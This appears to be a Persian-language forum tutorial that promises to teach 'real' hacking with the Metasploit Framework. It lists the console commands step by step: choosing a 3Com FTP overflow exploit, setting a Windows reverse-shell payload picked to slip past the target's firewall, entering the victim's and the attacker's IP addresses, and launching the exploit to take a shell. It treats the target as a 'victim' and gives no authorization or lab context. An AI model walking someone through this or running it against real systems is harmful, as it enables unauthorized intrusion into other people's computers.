خوب ایندفعه می خوام بهتون یاد بدم هک کنید به معنای واقعی
برای اینکار نیاز به برنامه زیر دارید:
Metasploit Framework Exploit
این برنامه رو میتونید همجا پیدا کنید این برنامه مجموعه ای از اکسپلویتها و پی لودهای مورد نیاز -- که تا کنون پابلیک شده اند-- است طرز استفاده از برنامه به صورت زیر است:
وسایل مورد نیاز
:
ای پی قربانی -ای پی خودتون-پورت مورد نظر تون رو سیستم هدف - سیستم عامل هدف
در مثال زیر به ترتیب کارهای لازم برای شما نوشته شده است:
توضیح مثال:
ایپی قربانی: ۸۵.۱۸۵.۲۱۶.۲
ایپی من: ۸۷.۴۸.۱۸۵.۴۶
پورت مردنظر برروی سیستم هدف: ۲۱ (پورت اف تی پی)
سیستم هدف: Windows NT 4.0
* طریقه بدست آوردن مشخصات بالا در درسهای گذشته توضیح داده شده است
** به بزرگی و کوچکی حروف توجه کنید
خوب شروع میکنیم ابتدا کنسول متاسپلویت رو باز میکنیم تایپ میکنیم:
show EXPLOITS
و تمامی اکسپلویتهای موجود در برنامه را ملاحظه میکنیم من این اکسپلویت را انتخاب میکنم و با دستور use از آن استفاده میکنم
use 3com_3cdaemon_ftp_overflow
حالا باید پیلود مورد نظر خودم رو از پیلودهای پیش فرض اکسپلویت پیدا کنم به صورت زیر:
show PAYLOADS
حالا پیلود موردنظرم رو انتخاب میکنم (من ریورس رو انتخاب میکنم که فایر وال هدف دور بخوره و به شلی که از سیستمش گرفتیم گیر نده)
set PAYLOAD win32_reverse_ord
حالا نوع سیستم عامل:
show TARGETS
من تارگت را برابر ۲ میزارم یعنی ویندوز ان تی
set TARGET 2
حالا باید مشخصات را به ترتیب به کنسول بدیم:
دادن ای پی قربانی: set RHOST ۸۵.۱۸۵.۲۱۶.۲
دادن ای پی خودمون برای شل ریورس: ۸۷.۴۸.۱۸۵.۴۶ set LHOST
در آخر کار به کنسول میگیم که نوبت اونه که شروع کنه:
exploit
حالا منتظر میمونیم که از هدف شل بگیریم
اگر شما از پیلودهای دیگر استفاده کنید منطقیه که باید مشخصات بیشتری به کنسول بدین مثل موارد زیر:
set CMD cmd.exe یعنی بعد از شل گرفتن cmd هدف رو براتون باز کنه
در کل شما با دستور زیر متوجه میشین که پیلود شما به چه چیزی احتیاج داره:
show OPTIONS
موفق باشین 
